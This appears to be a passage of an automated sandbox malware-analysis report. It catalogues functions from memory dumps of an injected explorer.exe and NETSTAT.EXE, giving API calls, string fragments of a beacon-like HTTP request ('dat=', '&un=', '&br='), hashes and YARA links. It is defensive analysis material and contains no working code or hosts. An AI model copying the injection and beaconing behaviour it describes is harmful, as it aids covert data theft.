Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: CF91D671E0020AEFDF24DF58D8456EEBBB4FF55304F24807AD842A7162E7395A51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007AE759, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_wcstoul.LIBCMT ref: 007AE7B2

Strings

Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 007AE893
]x, xrefs: 007AE75B

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcstoul
String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X$]x
API String ID: 1097018459-3343864547
Opcode ID: 25cea16187418f65a94f002e54d1e26c17bd52413924c558e6d4ea6293bedfc6
Instruction ID: bd677a5325f568174c220776ac0db13bf5c9d48c7bc308bd63513658312d371a
Opcode Fuzzy Hash: 25cea16187418f65a94f002e54d1e26c17bd52413924c558e6d4ea6293bedfc6
Instruction Fuzzy Hash: D441B172C00249EADF10DFE4C885BEEB7B8AF86310F10966AF551A7081E77CDA94C760

Uniqueness

Uniqueness Score: -1.00%

Function 0076C558, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0076C5C4

Strings

{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 0076C5BB
1s, xrefs: 0076C56F

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: 1s${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
API String ID: 48624451-1946412030
Opcode ID: f548b2fb9f9479ea38822a3b4a3bcba0772a09b9fffda3703d27a02004c228ab
Instruction ID: 7ac45f81307a6df3911eb3b7c5e6960220cc8496fe21478108cd81518d30aade
Opcode Fuzzy Hash: f548b2fb9f9479ea38822a3b4a3bcba0772a09b9fffda3703d27a02004c228ab
Instruction Fuzzy Hash: 100161A60085B065D72187AB4C11832FBF99FCEA15728C08EF6D98A296E17FC542D770

Uniqueness

Uniqueness Score: -1.00%

Function 007AE8DB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

_wcstoul.LIBCMT ref: 007AE901

Part of subcall function 007E5AA6: __cftof.LIBCMT ref: 007E5AB6

Strings

CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 007AE91B
]x, xrefs: 007AE8E3

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: __cftof_wcstoul
String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X$]x
API String ID: 1831096779-1492471241
Opcode ID: ed90c1bd5624fdd1ee8aad0d7513934891cea9aa4e2d05dfc58d92c89a28b082
Instruction ID: 8c3ae768993fb968cd615eb077720415bb297a59bf99a083496460f99a0ec5ba
Opcode Fuzzy Hash: ed90c1bd5624fdd1ee8aad0d7513934891cea9aa4e2d05dfc58d92c89a28b082
Instruction Fuzzy Hash: E4F0F637140208BADB142A55DC07E9B77ACDFD5B20F008219FA059A092EAB9EA0087A1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 1388 Parent PID: 2828 explorer.exeCOMMON

Executed Functions

Function 0293C302, Relevance: 23.7, APIs: 3, Strings: 10, Instructions: 911networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 0293C4AE
setsockopt.WS2_32 ref: 0293CCB2
recv.WS2_32 ref: 0293CCDA

Strings

=, xrefs: 0293C8D0
: cl, xrefs: 0293C73E
nnec, xrefs: 0293C72E
&un=, xrefs: 0293C948
&br=, xrefs: 0293C979
dat=, xrefs: 0293C6A4
GET , xrefs: 0293C768
tion, xrefs: 0293C736
ose, xrefs: 0293C746
Co, xrefs: 0293C726

Memory Dump Source

Source File: 0000000D.00000002.2370627853.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
API String ID: 1564272048-2976227712
Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
Instruction ID: 640501723da83b261ddd94bac95920f85f75d083efa04e12976ab5e5b69a1e9d
Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
Instruction Fuzzy Hash: 69629130618F088BC76AEB68D4947EAB7E6FB98304F50492ED49BD7242DF30A545CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02938EFE, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 02938F57

Strings

ket, xrefs: 02938F2A
esoc, xrefs: 02938F22
clos, xrefs: 02938F1A

Memory Dump Source

Source File: 0000000D.00000002.2370627853.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
Instruction ID: 9137c2caa85c3f16a2eb5e58e9eba40ea019fffd0ceab21b505d47b8ffc6a19b
Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
Instruction Fuzzy Hash: E4F06D7021CB089BCBC0DF1894887A9B7E1FB99314F54056DE48DCA204CB7885428782

Uniqueness

Uniqueness Score: -1.00%

Function 02938F02, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 02938F57

Strings

ket, xrefs: 02938F2A
esoc, xrefs: 02938F22
clos, xrefs: 02938F1A

Memory Dump Source

Source File: 0000000D.00000002.2370627853.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
Instruction ID: ccc7fd36a661c19efbe7800734688902fe5c6d81044139777be5c32de60d3784
Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
Instruction Fuzzy Hash: 2DF01770618B089FCBC4EF18D0C87A9B7E1FB99314F64556DB44ECA244CB7889468B82

Uniqueness

Uniqueness Score: -1.00%

Function 02938E7E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 02938EE1

Strings

conn, xrefs: 02938EAA
ect, xrefs: 02938EB1

Memory Dump Source

Source File: 0000000D.00000002.2370627853.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
Instruction ID: ef179d687af4cf77a09852ba34abc9eb752414c65464da5fbe748bb650520297
Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
Instruction Fuzzy Hash: DA012170618A088FDB94EF5CE088B15BBE0FB59314F1545AEE90DCB267CB74C8858B85

Uniqueness

Uniqueness Score: -1.00%

Function 02938E82, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 02938EE1

Strings

conn, xrefs: 02938EAA
ect, xrefs: 02938EB1

Memory Dump Source

Source File: 0000000D.00000002.2370627853.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
Instruction ID: d776c756f58eb6ec162fc6f242d3791b6c0a024656793b4ec80d8d21f082acfe
Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
Instruction Fuzzy Hash: AD014F70618A088FDB94EF5CE088B15B7E0FB58314F1545AFE80DCB227CB70C8868B81

Uniqueness

Uniqueness Score: -1.00%

Function 02938DF7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 02938E63

Strings

send, xrefs: 02938E2A

Memory Dump Source

Source File: 0000000D.00000002.2370627853.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
Instruction ID: 824e0d16b6e388815745d94155690f23847a4000a90a53dd84c4cc529cc36593
Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
Instruction Fuzzy Hash: 5E01E170918A188FDB94EF5CE089B1577E4EB98324F1545AE984DCB266CB70D882CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02938E02, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 02938E63

Strings

send, xrefs: 02938E2A

Memory Dump Source

Source File: 0000000D.00000002.2370627853.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
Instruction ID: 398cac0f59f0729925cdcd2d92a142d3c915c02bf37039a9a9e3f198d894b1fd
Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
Instruction Fuzzy Hash: 5B01123061CA088FDB94EF1CE088B1577E0EB5C314F1545AE984DCB266CB70D881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02938D02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 02938D61

Strings

sock, xrefs: 02938D29

Memory Dump Source

Source File: 0000000D.00000002.2370627853.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
Instruction ID: e539024e4f7ecb94c5f744e8d554411d6045f082708fa09257706a2a481077c2
Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
Instruction Fuzzy Hash: 8F012870658A188FDB84EF1CE048B14BBE0FB98314F1545AEE84DCB276C7B0C9428B86

Uniqueness

Uniqueness Score: -1.00%

Function 02934272, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 029342BD

Memory Dump Source

Source File: 0000000D.00000002.2370627853.0000000002900000.00000040.00000001.sdmp, Offset: 02900000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
Instruction ID: 58b7db3ac7955a7d3cc193ac633bc4c79fbf7ce6ed91eb55dd56d627d3f104b3
Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
Instruction Fuzzy Hash: 00218030614B4D8FDB65EF5890D43AAB3E6FB94304F4A167E8D5DCB206CB309441CB92

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: NETSTAT.EXE PID: 852 Parent PID: 1388 NETSTAT.EXECOMMON

Executed Functions

Function 000E81BA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,000E3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000E3B97,007A002E,00000000,00000060,00000000,00000000), ref: 000E820D

Strings

.z`, xrefs: 000E81FD, 000E8208

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 2cd2e8081aa97a836281e2c6ffc23810a248fa25900e6b8091681eab628c0ba3
Instruction ID: d7f8b257eee233b5d41c0a5f37fef49a7e54dcfbc13a94667c78b821873e8333
Opcode Fuzzy Hash: 2cd2e8081aa97a836281e2c6ffc23810a248fa25900e6b8091681eab628c0ba3
Instruction Fuzzy Hash: 4E2108B2214149AFCB08DF99DC84CEB77A9FF8C354B15864DFA1DA7212C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000E81C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,000E3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,000E3B97,007A002E,00000000,00000060,00000000,00000000), ref: 000E820D

Strings

.z`, xrefs: 000E81FD, 000E8208

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: bfbfba5bb55bb632654b3989855f20eade153c959fdb2410ed6bee3ab7713fcb
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: BFF0B6B2204108AFCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000E826A, Relevance: 1.6, APIs: 1, Instructions: 73filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(000E3D52,5E972F59,FFFFFFFF,000E3A11,?,?,000E3D52,?,000E3A11,FFFFFFFF,5E972F59,000E3D52,?,00000000), ref: 000E82B5

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f341c27a24302460da6598ec1f6ac45ea71e4978ec3d1700532319ca803e112a
Instruction ID: 6e8e717d1da3cd7d37db8f0325395dd759b66d22ec09a28d1259e6611374081e
Opcode Fuzzy Hash: f341c27a24302460da6598ec1f6ac45ea71e4978ec3d1700532319ca803e112a
Instruction Fuzzy Hash: 5721B8B2200108AFDB14DF99DC81EEB77ADEF8C754F158649FA1DA7251CA30E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000E8270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(000E3D52,5E972F59,FFFFFFFF,000E3A11,?,?,000E3D52,?,000E3A11,FFFFFFFF,5E972F59,000E3D52,?,00000000), ref: 000E82B5

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 327e65e036e34a25df2f32bf82b610f4d29f1d1723d7216b9b81c82409582716
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 74F0A9B2200108AFCB14DF89DC81DEB77ADAF8C754F158648BA1D97241DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000E82EB, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(000E3D30,?,?,000E3D30,00000000,FFFFFFFF), ref: 000E8315

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: b3ec95138bf0d61471c9bca1bc573295dd62235804d0820b1310c0b81caf86a4
Instruction ID: 1758962b4abf69af874584778c554025b86d4d8be02d7d3fe93da14aca03eb53
Opcode Fuzzy Hash: b3ec95138bf0d61471c9bca1bc573295dd62235804d0820b1310c0b81caf86a4
Instruction Fuzzy Hash: 63F01976204114AFD714EFD9DC80DEB776DEF88710F148559FA5C97241D630E91487A0

Uniqueness

Uniqueness Score: -1.00%

Function 000E83A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,000D2D11,00002000,00003000,00000004), ref: 000E83D9

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 86ecf06f4e8ca8c6a28326127d0a1bdc26149b14a28ccbb3505691661c261e10
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 28F015B2200208AFCB14DF89CC81EEB77ADAF88750F118548FE08A7241CA30F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000E82F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(000E3D30,?,?,000E3D30,00000000,FFFFFFFF), ref: 000E8315

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: a127ea0cacf94a13d99e76a7feaac42e73203318380c24f0692d87ec46a4fa66
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 40D012752002146BD710EF99CC45ED7775CEF44750F154455BA1C5B242C930F90087E0

Uniqueness

Uniqueness Score: -1.00%

Function 020C00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020C00CF

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 020C07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020C07B7

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 020BFAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BFAC3

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 020BFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BFADB

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 020BFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BFAF3

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 020BFB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BFB5B

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 020BFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BFB73

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
